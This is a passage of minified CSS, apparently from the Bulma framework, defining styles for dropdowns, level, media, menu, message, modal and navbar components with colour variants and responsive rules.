1rem;position:relative}a.dropdown-item,button.dropdown-item{padding-right:3rem;text-align:inherit;white-space:nowrap;width:100%}a.dropdown-item:hover,button.dropdown-item:hover{background-color:#f5f5f5;color:#0a0a0a}a.dropdown-item.is-active,button.dropdown-item.is-active{background-color:#485fc7;color:#fff}.dropdown-divider{background-color:#ededed;border:none;display:block;height:1px;margin:.5rem 0}.level{align-items:center;justify-content:space-between}.level code{border-radius:4px}.level img{display:inline-block;vertical-align:top}.level.is-mobile,.level.is-mobile .level-left,.level.is-mobile .level-right{display:flex}.level.is-mobile .level-left+.level-right{margin-top:0}.level.is-mobile .level-item:not(:last-child){margin-bottom:0;margin-right:.75rem}.level.is-mobile .level-item:not(.is-narrow){flex-grow:1}@media screen and (min-width: 769px),print{.level{display:flex}.level>.level-item:not(.is-narrow){flex-grow:1}}.level-item{align-items:center;display:flex;flex-basis:auto;flex-grow:0;flex-shrink:0;justify-content:center}.level-item .title,.level-item .subtitle{margin-bottom:0}@media screen and (max-width: 768px){.level-item:not(:last-child){margin-bottom:.75rem}}.level-left,.level-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.level-left .level-item.is-flexible,.level-right .level-item.is-flexible{flex-grow:1}@media screen and (min-width: 769px),print{.level-left .level-item:not(:last-child),.level-right .level-item:not(:last-child){margin-right:.75rem}}.level-left{align-items:center;justify-content:flex-start}@media screen and (max-width: 768px){.level-left+.level-right{margin-top:1.5rem}}@media screen and (min-width: 769px),print{.level-left{display:flex}}.level-right{align-items:center;justify-content:flex-end}@media screen and (min-width: 769px),print{.level-right{display:flex}}.media{align-items:flex-start;display:flex;text-align:inherit}.media .content:not(:last-child){margin-bottom:.75rem}.media .media{border-top:1px solid rgba(219,219,219,.5);display:flex;padding-top:.75rem}.media .media .content:not(:last-child),.media .media .control:not(:last-child){margin-bottom:.5rem}.media .media .media{padding-top:.5rem}.media .media .media+.media{margin-top:.5rem}.media+.media{border-top:1px solid rgba(219,219,219,.5);margin-top:1rem;padding-top:1rem}.media.is-large+.media{margin-top:1.5rem;padding-top:1.5rem}.media-left,.media-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.media-left{margin-right:1rem}.media-right{margin-left:1rem}.media-content{flex-basis:auto;flex-grow:1;flex-shrink:1;text-align:inherit}@media screen and (max-width: 768px){.media-content{overflow-x:auto}}.menu{font-size:1rem}.menu.is-small{font-size:.75rem}.menu.is-medium{font-size:1.25rem}.menu.is-large{font-size:1.5rem}.menu-list{line-height:1.25}.menu-list a{border-radius:2px;color:#4a4a4a;display:block;padding:.5em .75em}.menu-list a:hover{background-color:#f5f5f5;color:#363636}.menu-list a.is-active{background-color:#485fc7;color:#fff}.menu-list li ul{border-left:1px solid #dbdbdb;margin:.75em;padding-left:.75em}.menu-label{color:#7a7a7a;font-size:.75em;letter-spacing:.1em;text-transform:uppercase}.menu-label:not(:first-child){margin-top:1em}.menu-label:not(:last-child){margin-bottom:1em}.message{background-color:#f5f5f5;border-radius:4px;font-size:1rem}.message strong{color:currentColor}.message a:not(.button):not(.tag):not(.dropdown-item){color:currentColor;text-decoration:underline}.message.is-small{font-size:.75rem}.message.is-medium{font-size:1.25rem}.message.is-large{font-size:1.5rem}.message.is-white{background-color:#fff}.message.is-white .message-header{background-color:#fff;color:#0a0a0a}.message.is-white .message-body{border-color:#fff}.message.is-black{background-color:#fafafa}.message.is-black .message-header{background-color:#0a0a0a;color:#fff}.message.is-black .message-body{border-color:#0a0a0a}.message.is-light{background-color:#fafafa}.message.is-light .message-header{background-color:#f5f5f5;color:#000000b3}.message.is-light .message-body{border-color:#f5f5f5}.message.is-dark{background-color:#fafafa}.message.is-dark .message-header{background-color:#363636;color:#fff}.message.is-dark .message-body{border-color:#363636}.message.is-primary{background-color:#ebfffc}.message.is-primary .message-header{background-color:#00d1b2;color:#fff}.message.is-primary .message-body{border-color:#00d1b2;color:#00947e}.message.is-link{background-color:#eff1fa}.message.is-link .message-header{background-color:#485fc7;color:#fff}.message.is-link .message-body{border-color:#485fc7;color:#3850b7}.message.is-info{background-color:#eff5fb}.message.is-info .message-header{background-color:#3e8ed0;color:#fff}.message.is-info .message-body{border-color:#3e8ed0;color:#296fa8}.message.is-success{background-color:#effaf5}.message.is-success .message-header{background-color:#48c78e;color:#fff}.message.is-success .message-body{border-color:#48c78e;color:#257953}.message.is-warning{background-color:#fffaeb}.message.is-warning .message-header{background-color:#ffe08a;color:#000000b3}.message.is-warning .message-body{border-color:#ffe08a;color:#946c00}.message.is-danger{background-color:#feecf0}.message.is-danger .message-header{background-color:#f14668;color:#fff}.message.is-danger .message-body{border-color:#f14668;color:#cc0f35}.message-header{align-items:center;background-color:#4a4a4a;border-radius:4px 4px 0 0;color:#fff;display:flex;font-weight:700;justify-content:space-between;line-height:1.25;padding:.75em 1em;position:relative}.message-header .delete{flex-grow:0;flex-shrink:0;margin-left:.75em}.message-header+.message-body{border-width:0;border-top-left-radius:0;border-top-right-radius:0}.message-body{border-color:#dbdbdb;border-radius:4px;border-style:solid;border-width:0 0 0 4px;color:#4a4a4a;padding:1.25em 1.5em}.message-body code,.message-body pre{background-color:#fff}.message-body pre code{background-color:transparent}.modal{align-items:center;display:none;flex-direction:column;justify-content:center;overflow:hidden;position:fixed;z-index:40}.modal.is-active{display:flex}.modal-background{background-color:#0a0a0adb}.modal-content,.modal-card{margin:0 20px;max-height:calc(100vh - 160px);overflow:auto;position:relative;width:100%}@media screen and (min-width: 769px){.modal-content,.modal-card{margin:0 auto;max-height:calc(100vh - 40px);width:640px}}.modal-close{background:none;height:40px;position:fixed;right:20px;top:20px;width:40px}.modal-card{display:flex;flex-direction:column;max-height:calc(100vh - 40px);overflow:hidden;-ms-overflow-y:visible}.modal-card-head,.modal-card-foot{align-items:center;background-color:#f5f5f5;display:flex;flex-shrink:0;justify-content:flex-start;padding:20px;position:relative}.modal-card-head{border-bottom:1px solid #dbdbdb;border-top-left-radius:6px;border-top-right-radius:6px}.modal-card-title{color:#363636;flex-grow:1;flex-shrink:0;font-size:1.5rem;line-height:1}.modal-card-foot{border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:1px solid #dbdbdb}.modal-card-foot .button:not(:last-child){margin-right:.5em}.modal-card-body{-webkit-overflow-scrolling:touch;background-color:#fff;flex-grow:1;flex-shrink:1;overflow:auto;padding:20px}.navbar{background-color:#fff;min-height:3.25rem;position:relative;z-index:30}.navbar.is-white{background-color:#fff;color:#0a0a0a}.navbar.is-white .navbar-brand>.navbar-item,.navbar.is-white .navbar-brand .navbar-link{color:#0a0a0a}.navbar.is-white .navbar-brand>a.navbar-item:focus,.navbar.is-white .navbar-brand>a.navbar-item:hover,.navbar.is-white .navbar-brand>a.navbar-item.is-active,.navbar.is-white .navbar-brand .navbar-link:focus,.navbar.is-white .navbar-brand .navbar-link:hover,.navbar.is-white .navbar-brand .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link:after{border-color:#0a0a0a}.navbar.is-white .navbar-burger{color:#0a0a0a}@media screen and (min-width: 1024px){.navbar.is-white .navbar-start>.navbar-item,.navbar.is-white .navbar-start .navbar-link,.navbar.is-white .navbar-end>.navbar-item,.navbar.is-white .navbar-end .navbar-link{color:#0a0a0a}.navbar.is-white .navbar-start>a.navbar-item:focus,.navbar.is-white .navbar-start>a.navbar-item:hover,.navbar.is-white .navbar-start>a.navbar-item.is-active,.navbar.is-white .navbar-start .navbar-link:focus,.navbar.is-white .navbar-start .navbar-link:hover,.navbar.is-white .navbar-start .navbar-link.is-active,.navbar.is-white .navbar-end>a.navbar-item:focus,.navbar.is-white .navbar-end>a.navbar-item:hover,.navbar.is-white .navbar-end>a.navbar-item.is-active,.navbar.is-white .navbar-end .navbar-link:focus,.navbar.is-white .navbar-end .navbar-link:hover,.navbar.is-white .navbar-end .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-start .navbar-link:after,.navbar.is-white .navbar-end .navbar-link:after{border-color:#0a0a0a}.navbar.is-white .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-white .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-white .navbar-item.has-dropdown.is-active .navbar-link{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-dropdown a.navbar-item.is-active{background-color:#fff;color:#0a0a0a}}.navbar.is-black{background-color:#0a0a0a;color:#fff}.navbar.is-black .navbar-brand>.navbar-item,.navbar.is-black .navbar-brand .navbar-link{color:#fff}.navbar.is-black .navbar-brand>a.navbar-item:focus,.navbar.is-black .navbar-brand>a.navbar-item:hover,.navbar.is-black .navbar-brand>a.navbar-item.is-active,.navbar.is-black .navbar-brand .navbar-link:focus,.navbar.is-black .navbar-brand .navbar-link:hover,.navbar.is-black .navbar-brand .navbar-link.is-active{background-color:#000;color:#fff}.navbar.is-black .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-black .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-black .navbar-start>.navbar-item,.navbar.is-black .navbar-start .navbar-link,.navbar.is-black .navbar-end>.navbar-item,.navbar.is-black .navbar-end .navbar-link{color:#fff}.navbar.is-black .navbar-start>a.navbar-item:focus,.navbar.is-black .navbar-start>a.navbar-item:hover,.navbar.is-black .navbar-start>a.navbar-item.is-active,.navbar.is-black .navbar-start .navbar-link:focus,.navbar.is-black .navbar-start .navbar-link:hover,.navbar.is-black .navbar-start .navbar-link.is-active,.navbar.is-black .navbar-end>a.navbar-item:focus,.navbar.is-black .navbar-end>a.navbar-item:hover,.navbar.is-black .navbar-end>a.navbar-item.is-active,.navbar.is-black .navbar-end .navbar-link:focus,.navbar.is-black .navbar-end .navbar-link:hover,.navbar.is-black .navbar-end .navbar-link.is-active{background-color:#000;color:#fff}.navbar.is-black .navbar-start .navbar-link:after,.navbar.is-black .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-black .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-black .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-black .navbar-item.has-dropdown.is-active .navbar-link{background-color:#000;color:#fff}.navbar.is-black .navbar-dropdown a.navbar-item.is-active{background-color:#0a0a0a;color:#fff}}.navbar.is-light{background-color:#f5f5f5;color:#000000b3}.navbar.is-light .navbar-brand>.navbar-item,.navbar.is-light .navbar-brand .navbar-link{color:#000000b3}.navbar.is-light .navbar-brand>a.navbar-item:focus,.navbar.is-light .navbar-brand>a.navbar-item:hover,.navbar.is-light .navbar-brand>a.navbar-item.is-active,.navbar.is-light .navbar-brand .navbar-link:focus,.navbar.is-light .navbar-brand .navbar-link:hover,.navbar.is-light .navbar-brand .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-brand .navbar-link:after{border-color:#000000b3}.navbar.is-light .navbar-burger{color:#000000b3}@media screen and (min-width: 1024px){.navbar.is-light .navbar-start>.navbar-item,.navbar.is-light .navbar-start .navbar-link,.navbar.is-light .navbar-end>.navbar-item,.navbar.is-light .navbar-end .navbar-link{color:#000000b3}.navbar.is-light .navbar-start>a.navbar-item:focus,.navbar.is-light .navbar-start>a.navbar-item:hover,.navbar.is-light .navbar-start>a.navbar-item.is-active,.navbar.is-light .navbar-start .navbar-link:focus,.navbar.is-light .navbar-start .navbar-link:hover,.navbar.is-light .navbar-start .navbar-link.is-active,.navbar.is-light .navbar-end>a.navbar-item:focus,.navbar.is-light .navbar-end>a.navbar-item:hover,.navbar.is-light .navbar-end>a.navbar-item.is-active,.navbar.is-light .navbar-end .navbar-link:focus,.navbar.is-light .navbar-end .navbar-link:hover,.navbar.is-light .navbar-end .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-start .navbar-link:after,.navbar.is-light .navbar-end .navbar-link:after{border-color:#000000b3}.navbar.is-light .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-light .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-light .navbar-item.has-dropdown.is-active .navbar-link{background-color:#e8e8e8;color:#000000b3}.navbar.is-light .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:#000000b3}}.navbar.is-dark{background-color:#363636;color:#fff}.navbar.is-dark .navbar-brand>.navbar-item,.navbar.is-dark .navbar-brand .navbar-link{color:#fff}.navbar.is-dark .navbar-brand>a.navbar-item:focus,.navbar.is-dark .navbar-brand>a.navbar-item:hover,.navbar.is-dark .navbar-brand>a.navbar-item.is-active,.navbar.is-dark .navbar-brand .navbar-link:focus,.navbar.is-dark .navbar-brand .navbar-link:hover,.navbar.is-dark .navbar-brand .navbar-link.is-active{background-color:#292929;color:#fff}.navbar.is-dark .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-dark .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-dark .navbar-start>.navbar-item,.navbar.is-dark .navbar-start .navbar-link,.navbar.is-dark .navbar-end>.navbar-item,.navbar.is-dark .navbar-end .navbar-link{color:#fff}.navbar.is-dark .navbar-start>a.navbar-item:focus,.navbar.is-dark .navbar-start>a.navbar-item:hover,.navbar.is-dark .navbar-start>a.navbar-item.is-active,.navbar.is-dark .navbar-start .navbar-link:focus,.navbar.is-dark .navbar-start .navbar-link:hover,.navbar.is-dark .navbar-start .navbar-link.is-active,.navbar.is-dark .navbar-end>a.navbar-item:focus,.navbar.is-dark .navbar-end>a.navbar-item:hover,.navbar.is-dark .navbar-end>a.navbar-item.is-active,.navbar.is-dark .navbar-end .navbar-link:focus,.navbar.is-dark .navbar-end .navbar-link:hover,.navbar.is-dark .navbar-end .navbar-link.is-active{background-color:#292929;color:#fff}.navbar.is-dark .navbar-start .navbar-link:after,.navbar.is-dark .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-dark .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-dark .navbar-item.has-dropdown.is-active .navbar-link{background-color:#292929;color:#fff}.navbar.is-dark .navbar-dropdown a.navbar-item.is-active{background-color:#363636;color:#fff}}.navbar.is-primary{background-color:#00d1b2;color:#fff}.navbar.is-primary .navbar-brand>.navbar-item,.navbar.is-primary .navbar-brand .navbar-link{color:#fff}.navbar.is-primary .navbar-brand>a.navbar-item:focus,.navbar.is-primary .navbar-brand>a.navbar-item:hover,.navbar.is-primary .navbar-brand>a.navbar-item.is-active,.navbar.is-primary .navbar-brand .navbar-link:focus,.navbar.is-primary .navbar-brand .navbar-link:hover,.navbar.is-primary .navbar-brand .navbar-link.is-active{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-primary .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-primary .navbar-start>.navbar-item,.navbar.is-primary .navbar-start .navbar-link,.navbar.is-primary .navbar-end>.navbar-item,.navbar.is-primary .navbar-end .navbar-link{color:#fff}.navbar.is-primary .navbar-start>a.navbar-item:focus,.navbar.is-primary .navbar-start>a.navbar-item:hover,.navbar.is-primary .navbar-start>a.navbar-item.is-active,.navbar.is-primary .navbar-start .navbar-link:focus,.navbar.is-primary .navbar-start .navbar-link:hover,.navbar.is-primary .navbar-start .navbar-link.is-active,.navbar.is-primary .navbar-end>a.navbar-item:focus,.navbar.is-primary .navbar-end>a.navbar-item:hover,.navbar.is-primary .navbar-end>a.navbar-item.is-active,.navbar.is-primary .navbar-end .navbar-link:focus,.navbar.is-primary .navbar-end .navbar-link:hover,.navbar.is-primary .navbar-end .navbar-link.is-active{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-start .navbar-link:after,.navbar.is-primary .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-primary .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-primary .navbar-item.has-dropdown.is-active .navbar-link{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-dropdown a.navbar-item.is-active{background-color:#00d1b2;color:#fff}}.navbar.is-link{background-color:#485fc7;color:#fff}.navbar.is-link .navbar-brand>.navbar-item,.navbar.is-link .navbar-brand .navbar-link{color:#fff}.navbar.is-link .navbar-brand>a.navbar-item:focus,.navbar.is-link .navbar-brand>a.navbar-item:hover,.navbar.is-link .navbar-brand>a.navbar-item.is-active,.navbar.is-link .navbar-brand .navbar-link:focus,.navbar.is-link .navbar-brand .navbar-link:hover,.navbar.is-link .navbar-brand .navbar-link.is-active{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-link .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-link .navbar-start>.navbar-item,.navbar.is-link .navbar-start .navbar-link,.navbar.is-link .navbar-end>.navbar-item,.navbar.is-link .navbar-end .navbar-link{color:#fff}.navbar.is-link .navbar-start>a.navbar-item:focus,.navbar.is-link .navbar-start>a.navbar-item:hover,.navbar.is-link .navbar-start>a.navbar-item.is-active,.navbar.is-link .navbar-start .navbar-link:focus,.navbar.is-link .navbar-start .navbar-link:hover,.navbar.is-link .navbar-start .navbar-link.is-active,.navbar.is-link .navbar-end>a.navbar-item:focus,.navbar.is-link .navbar-end>a.navbar-item:hover,.navbar.is-link .navbar-end>a.navbar-item.is-active,.navbar.is-link .navbar-end .navbar-link:focus,.navbar.is-link .navbar-end .navbar-link:hover,.navbar.is-link .navbar-end .navbar-link.is-active{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-start .navbar-link:after,.navbar.is-link .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-link .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-link .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-link .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3a51bb;color:#fff}.navbar.is-link .navbar-dropdown a.navbar-item.is-active{background-color:#485fc7;color:#fff}}.navbar.is-info{background-color:#3e8ed0;color:#fff}.navbar.is-info .navbar-brand>.navbar-item,.navbar.is-info .navbar-brand .navbar-link{color:#fff}.navbar.is-info .navbar-brand>a.navbar-item:focus,.navbar.is-info .navbar-brand>a.navbar-item:hover,.navbar.is-info .navbar-brand>a.navbar-item.is-active,.navbar.is-info .navbar-brand .navbar-link:focus,.navbar.is-info .navbar-brand .navbar-link:hover,.navbar.is-info .navbar-brand .navbar-link.is-active{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-info .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-info .navbar-start>.navbar-item,.navbar.is-info .navbar-start .navbar-link,.navbar.is-info .navbar-end>.navbar-item,.navbar.is-info .navbar-end .navbar-link{color:#fff}.navbar.is-info .navbar-start>a.navbar-item:focus,.navbar.is-info .navbar-start>a.navbar-item:hover,.navbar.is-info .navbar-start>a.navbar-item.is-active,.navbar.is-info .navbar-start .navbar-link:focus,.navbar.is-info .navbar-start .navbar-link:hover,.navbar.is-info .navbar-start .navbar-link.is-active,.navbar.is-info .navbar-end>a.navbar-item:focus,.navbar.is-info .navbar-end>a.navbar-item:hover,.navbar.is-info .navbar-end>a.navbar-item.is-active,.navbar.is-info .navbar-end .navbar-link:focus,.navbar.is-info .navbar-end .navbar-link:hover,.navbar.is-info .navbar-end .navbar-link.is-active{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-start .navbar-link:after,.navbar.is-info .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-info .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-info .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-info .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3082c5;color:#fff}.navbar.is-info .navbar-dropdown a.navbar-item.is-active{background-color:#3e8ed0;color:#fff}}.navbar.is-success{background-color:#48c78e;color:#fff}.navbar.is-success .navbar-brand>.navbar-item,.navbar.is-success .navbar-brand .navbar-link{color:#fff}.navbar.is-success .navbar-brand>a.navbar-item:focus,.navbar.is-success .navbar-brand>a.navbar-item:hover,.navbar.is-success .navbar-brand>a.navbar-item.is-active,.navbar.is-success .navbar-brand .navbar-link:focus,.navbar.is-success .navbar-brand .navbar-link:hover,.navbar.is-success .navbar-brand .navbar-link.is-active{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-success .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-success .navbar-start>.navbar-item,.navbar.is-success .navbar-start .navbar-link,.navbar.is-success .navbar-end>.navbar-item,.navbar.is-success .navbar-end .navbar-link{color:#fff}.navbar.is-success .navbar-start>a.navbar-item:focus,.navbar.is-success .navbar-start>a.navbar-item:hover,.navbar.is-success .navbar-start>a.navbar-item.is-active,.navbar.is-success .navbar-start .navbar-link:focus,.navbar.is-success .navbar-start .navbar-link:hover,.navbar.is-success .navbar-start .navbar-link.is-active,.navbar.is-success .navbar-end>a.navbar-item:focus,.navbar.is-success .navbar-end>a.navbar-item:hover,.navbar.is-success .navbar-end>a.navbar-item.is-active,.navbar.is-success .navbar-end .navbar-link:focus,.navbar.is-success .navbar-end .navbar-link:hover,.navbar.is-success .navbar-end .navbar-link.is-active{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-start .navbar-link:after,.navbar.is-success .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-success .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-success .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-success .navbar-item.has-dropdown.is-active .navbar-link{background-color:#3abb81;color:#fff}.navbar.is-success .navbar-dropdown a.navbar-item.is-active{background-color:#48c78e;color:#fff}}.navbar.is-warning{background-color:#ffe08a;color:#000000b3}.navbar.is-warning .navbar-brand>.navbar-item,.navbar.is-warning .navbar-brand .navbar-link{color:#000000b3}.navbar.is-warning .navbar-brand>a.navbar-item:focus,.navbar.is-warning .navbar-brand>a.navbar-item:hover,.navbar.is-warning .navbar-brand>a.navbar-item.is-active,.navbar.is-warning .navbar-brand .navbar-link:focus,.navbar.is-warning .navbar-brand .navbar-link:hover,.navbar.is-warning .navbar-brand .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-brand .navbar-link:after{border-color:#000000b3}.navbar.is-warning .navbar-burger{color:#000000b3}@media screen and (min-width: 1024px){.navbar.is-warning .navbar-start>.navbar-item,.navbar.is-warning .navbar-start .navbar-link,.navbar.is-warning .navbar-end>.navbar-item,.navbar.is-warning .navbar-end .navbar-link{color:#000000b3}.navbar.is-warning .navbar-start>a.navbar-item:focus,.navbar.is-warning .navbar-start>a.navbar-item:hover,.navbar.is-warning .navbar-start>a.navbar-item.is-active,.navbar.is-warning .navbar-start .navbar-link:focus,.navbar.is-warning .navbar-start .navbar-link:hover,.navbar.is-warning .navbar-start .navbar-link.is-active,.navbar.is-warning .navbar-end>a.navbar-item:focus,.navbar.is-warning .navbar-end>a.navbar-item:hover,.navbar.is-warning .navbar-end>a.navbar-item.is-active,.navbar.is-warning .navbar-end .navbar-link:focus,.navbar.is-warning .navbar-end .navbar-link:hover,.navbar.is-warning .navbar-end .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-start .navbar-link:after,.navbar.is-warning .navbar-end .navbar-link:after{border-color:#000000b3}.navbar.is-warning .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-warning .navbar-item.has-dropdown.is-active .navbar-link{background-color:#ffd970;color:#000000b3}.navbar.is-warning .navbar-dropdown a.navbar-item.is-active{background-color:#ffe08a;color:#000000b3}}.navbar.is-danger{background-color:#f14668;color:#fff}.navbar.is-danger .navbar-brand>.navbar-item,.navbar.is-danger .navbar-brand .navbar-link{color:#fff}.navbar.is-danger .navbar-brand>a.navbar-item:focus,.navbar.is-danger .navbar-brand>a.navbar-item:hover,.navbar.is-danger .navbar-brand>a.navbar-item.is-active,.navbar.is-danger .navbar-brand .navbar-link:focus,.navbar.is-danger .navbar-brand .navbar-link:hover,.navbar.is-danger .navbar-brand .navbar-link.is-active{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-brand .navbar-link:after{border-color:#fff}.navbar.is-danger .navbar-burger{color:#fff}@media screen and (min-width: 1024px){.navbar.is-danger .navbar-start>.navbar-item,.navbar.is-danger .navbar-start .navbar-link,.navbar.is-danger .navbar-end>.navbar-item,.navbar.is-danger .navbar-end .navbar-link{color:#fff}.navbar.is-danger .navbar-start>a.navbar-item:focus,.navbar.is-danger .navbar-start>a.navbar-item:hover,.navbar.is-danger .navbar-start>a.navbar-item.is-active,.navbar.is-danger .navbar-start .navbar-link:focus,.navbar.is-danger .navbar-start .navbar-link:hover,.navbar.is-danger .navbar-start .navbar-link.is-active,.navbar.is-danger .navbar-end>a.navbar-item:focus,.navbar.is-danger .navbar-end>a.navbar-item:hover,.navbar.is-danger .navbar-end>a.navbar-item.is-active,.navbar.is-danger .navbar-end .navbar-link:focus,.navbar.is-danger .navbar-end .navbar-link:hover,.navbar.is-danger .navbar-end .navbar-link.is-active{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-start .navbar-link:after,.navbar.is-danger .navbar-end .navbar-link:after{border-color:#fff}.navbar.is-danger .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:hover .navbar-link,.navbar.is-danger .navbar-item.has-dropdown.is-active .navbar-link{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-dropdown a.navbar-item.is-active{background-color:#f14668;color:#fff}}.navbar>.container{align-items:stretch;display:flex;min-height:3.25rem;width:100%}.navbar.has-shadow{box-shadow:0 2px #f5f5f5}.navbar.is-fixed-bottom,.navbar.is-fixed-top{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom{bottom:0}.navbar.is-fixed-bottom.has-shadow{box-shadow:0 -2px #f5f5f5}.navbar.is-fixed-top{top:0}html.has-navbar-fixed-top,body.has-navbar-fixed-top{padding-top:3.25rem}html.has-navbar-fixed-bottom,body.has-navbar-fixed-bottom{padding-bottom:3.25rem}.navbar-brand,.navbar-tabs{align-items:stretch;display:flex;flex-shrink:0;min-height:3.25rem}.navbar-brand a.navbar-item:focus,.navbar-brand a.navbar-item:hover{background-color:transparent}.navbar-tabs{-webkit-overflow-scrolling:touch;max-width:100vw;overflow-x:auto;overflow-y:hidden}.navbar-burger{color:#4a4a4a;-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;cursor:pointer;display:block;height:3.25rem;position:relative;width:3.25rem;margin-left:auto}.navbar-burger span{background-color:currentColor;display:block;height:1px;left:calc(50% - 8px);position:absolute;transform-origin:center;transition-duration:86ms;transition-property:background-color,opacity,transform;transition-timing-function:ease-out;width:16px}.navbar-burger span:nth-child(1){top:calc(50% - 6px)}.navbar-burger span:nth-child(2){top:calc(50% - 1px)}.navbar-burger span:nth-child(3){top:calc(50% + 4px)}.navbar-burger:hover{background-color:#0000000d}.navbar-burger.is-active span:nth-child(1){transform:translateY(5px) rotate(45deg)}.navbar-burger.is-active span:nth-child(2){opacity:0}.navbar-burger.is-active span:nth-child(3){transform:translateY(-5px) rotate(-45deg)}.navbar-menu{display:none}.navbar-item,.navbar-link{color:#4a4a4a;display:block;line-height:1.5;padding:.5rem .75rem;position:relative}.navbar-item .icon:only-child,.navbar-link .icon:only-child{margin-left:-.25rem;margin-right:-.25rem}a.navbar-item,.navbar-link{cursor:pointer}a.navbar-item:focus,a.navbar-item:focus-within,a.navbar-item:hover,a.navbar-item.is-active,.navbar-link:focus,.navbar-link:focus-within,.navbar-link:hover,.navbar-link.is-active{background-color:#fafafa;color:#485fc7}.navbar-item{flex-grow:0;flex-shrink:0}.navbar-item img{max-height:1.75rem}.navbar-item.has-dropdown{padding:0}.navbar-item.is-expanded{flex-grow:1;flex-shrink:1}.navbar-item.is-tab{border-bottom:1px solid transparent;min-height:3.25rem;padding-bottom:calc(.5rem - 1px)}.navbar-item.is-tab:focus,.navbar-item.is-tab:hover{background-color:transparent;border-bottom-color:#485fc7}.navbar-item.is-tab.is-active{background-color:transparent;border-bottom-color:#485fc7;border-bottom-style:solid;border-bottom-width:3px;color:#485fc7;padding-bottom:calc(.5rem - 3px)}.navbar-content{flex-grow:1;flex-shrink:1}.navbar-link:not(.is-arrowless){padding-right:2.5em}.navbar-link:not(.is-arrowless):after{border-color:#485fc7;margin-top:-.375em;right:1.125em}.navbar-dropdown{font-size:.875rem;padding-bottom:.5rem;padding-top:.5rem}.navbar-dropdown .navbar-item{padding-left:1.5rem;padding-right:1.5rem}.navbar-divider{background-color:#f5f5f5;border:none;display:none;height:2px;margin:.5rem 0}@media screen and (max-width: 1023px){.navbar>.container{display:block}.navbar-brand .navbar-item,.navbar-tabs .navbar-item{align-items:center;display:flex}.navbar-link:after{display:none}.navbar-menu{background-color:#fff;box-shadow:0 8px 16px #0a0a0a1a;padding:.5rem 0}.navbar-menu.is-active{display:block}.navbar.is-fixed-bottom-touch,.navbar.is-fixed-top-touch{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-touch{bottom:0}.navbar.is-fixed-bottom-touch.has-shadow{box-shadow:0 -2px 3px #0a0a0a1a}.navbar.is-fixed-top-touch{top:0}.navbar.is-fixed-top .navbar-menu,.navbar.is-fixed-top-touch .navbar-menu{-webkit-overflow-scrolling:touch;max-height:calc(100vh - 3.25rem);overflow:auto}html.has-navbar-fixed-top-touch,body.has-navbar-fixed-top-touch{padding-top:3.25rem}html.has-navbar-fixed-bottom-touch,body.has-navbar-fixed-bottom-touch{padding-bottom:3.25rem}}@media screen and (min-width: 1024px){.navbar,.navbar-menu,.navbar-start,.navbar-end{align-items:stretch;display:flex}.navbar{min-height:3.25rem}.navbar.is-spaced{padding:1rem 